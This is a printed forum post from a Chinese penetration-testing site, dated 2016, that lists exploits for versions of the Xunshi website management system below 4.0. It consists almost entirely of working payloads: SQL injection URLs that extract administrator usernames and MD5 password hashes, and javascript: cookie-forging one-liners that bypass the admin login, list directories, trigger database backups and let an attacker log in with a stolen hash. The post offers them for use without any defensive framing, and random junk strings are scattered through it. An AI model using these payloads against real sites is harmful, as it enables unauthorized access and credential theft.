中国网络渗透测试联盟

标题: 讯时网站管理系统4.0以下漏洞 [打印本页]

作者: admin    时间: 2016-5-11 14:55
标题: 讯时网站管理系统4.0以下漏洞
一、注入' P& J8 @$ `# Q* X, i; m" {4 m
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
; l5 b  {- ^7 X3 B( E& c! I. c- c6 s& g! X0 G
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" * H0 M, ?9 f: P4 N' F- T
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
+ P$ L0 N- R* b- T可得到用户名和MD5加密码的密码。2 V/ ]9 }8 r/ p9 D4 l5 n5 R
% _8 I- ?7 i. q  I3 K$ B  j
二、cookies欺骗$ ^/ ]# q4 R1 g5 j
! Y8 g$ a9 [" d8 B2 [
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
+ W6 a1 N1 t, rjavascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
, n+ Q8 @2 {% H+ G& }# s+ M: o
! I! z. v  c9 |0 t9 {2、列目录. , Y! s8 O+ j* r! F" `8 w: }
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."4 L6 ]/ m' E8 Q5 T3 D/ e
6 T7 ?# L6 j. j! O# T3 B
3、数据库备份(适用性好像比较低.) ' @) r  x% P3 `3 Q! H
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"! h7 f  g" X! W. L

# K& W6 J9 E* \' p$ M4、得到MD5密码解不了密进后台方法
" L/ C2 w8 \  N: ljavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
2 G- v- z7 [5 ^' _+ W0 f




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2